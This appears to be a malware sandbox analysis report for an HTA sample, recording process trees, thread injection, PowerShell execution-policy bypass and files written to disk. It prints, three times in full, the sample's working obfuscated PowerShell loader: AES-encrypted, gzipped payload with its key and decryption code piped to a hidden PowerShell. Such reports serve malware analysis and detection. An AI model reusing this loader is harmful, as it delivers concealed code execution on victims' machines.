[System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell - }
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell - }
parent_process	powershell.exe	martian_process	C:\Windows\System32\cmd.exe /c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell -
parent_process	powershell.exe	martian_process	"C:\Windows\system32\cmd.exe" /c powershell.exe $sXWykRBF = 'AAAAAAAAAAAAAAAAAAAAAJpoGWaNf5IdlBmuvwtYV9TVr/VpIoDYevkd9CvadOuHa6CgsxOKFSJyQe5/lXF5b8H9L3qLyr4t4ySRH+9zc9SGvqLkXK50KAkT/W1T9hOe4gq3fVzRNKSn0H7OWSSOr+YXI5c6sEYlAqA/zutoKq4lUdwqwXtqW/yQJpL7pob2jZlCWEBh7dF8Vx41fr/KJJZBzvedXt72yW47z27UrrfjPLvVhw8AiSNBojD3V2wNcSG4dxkq2wXhTcGgAjU57CDSYNY1oPFcxvkkMcd8NlM+Jjv5tSbN65Y6WPkieNrQPmTF1MX7EUtITzzDYmOrV9yVKFfrrW5rThyg1cpRfKM4qJ0GucikSrp6jYKtTcMn8GK1PrTJ6mDmbFEHkBTcwieZhqp/UO8l1He33I9VcIKN466EjIcWdJeyEk/Qgkn+ny9zqy+VO7vdbEMvJYfIzQFx1cJXF0llmvvXVvczx1XRzSWZtqo7aIUXj1n/PYmSH5FjDkm299dbE2/DYXapmV/G89a07mxC7SR6VGh0fOLx8/xj/qh9sT6Ho52ei6fmNZf+y2hP1N7R+++3BcD0zDWMOSnHDiP+BytDWczf1Atmczui2y3Jn7gL2pI9vJ3MT7WV3ZVGJRcAeITqiKnUtIaM/Ojx4tPGVZxhtOD7U1bML/OgUkMGP0s0nPGzOACBJyjbMENvN3sY1c0C8tcrRYp2JXcAJPxvzZrniU53I59hUbnp15mRjm6YMH4whnKIaBYDZpqRVBG0zfpOriy06KPle7wg0GBtz1EJOtHXDc2qOOaa9X/piFXKxXNv4T1zPKdMC9lFDI9S4HCMSsn2PHmRxsHPV1agbpN7uecE39zyW89jwhQOCFpWgEtCTk8Xr/4oTUq8xQSzW4Pd3mCggvEk7ePnzHdvTuAHki9wirFFx/gn2quGL6fmCO6QkVXkKFmMzzCAyl2z5p2tjGk8tM3or4VJ87tr+JsQhg4kjHL/UWFLPodNSMlAyd1yF0ODyMj5V+G0ec2Vhk0eppTY4Q==';$rbYLVE = 'amFBcWZOeWJqeFlsREdJbWROT09kWmFVV2pUaEhYc3o=';$CuIweXh = New-Object 'System.Security.Cryptography.AesManaged';$CuIweXh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CuIweXh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CuIweXh.BlockSize = 128;$CuIweXh.KeySize = 256;$CuIweXh.Key = [System.Convert]::FromBase64String($rbYLVE);$ZzeKD = [System.Convert]::FromBase64String($sXWykRBF);$xXkozePy = $ZzeKD[0..15];$CuIweXh.IV = $xXkozePy;$MJBVchSHX = $CuIweXh.CreateDecryptor();$knMAOfntz = $MJBVchSHX.TransformFinalBlock($ZzeKD, 16, $ZzeKD.Length - 16);$CuIweXh.Dispose();$AmKl = New-Object System.IO.MemoryStream( , $knMAOfntz );$nmHfSWqs = New-Object System.IO.MemoryStream;$qzLQCznWu = New-Object System.IO.Compression.GzipStream $AmKl, ([IO.Compression.CompressionMode]::Decompress);$qzLQCznWu.CopyTo( $nmHfSWqs );$qzLQCznWu.Close();$AmKl.Close();[byte[]] $WjmlMrK = $nmHfSWqs.ToArray();$girxv = [System.Text.Encoding]::UTF8.GetString($WjmlMrK);$girxv \| powershell -

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3068 resumed a thread in remote process 1188
NtResumeThread March 9, 2023, 10:39 a.m.	thread_handle: 0x0000000000000360 suspend_count: 1 process_identifier: 1188	1	0	0

Creates a suspicious Powershell process (4 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

htatest1.hta.html

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All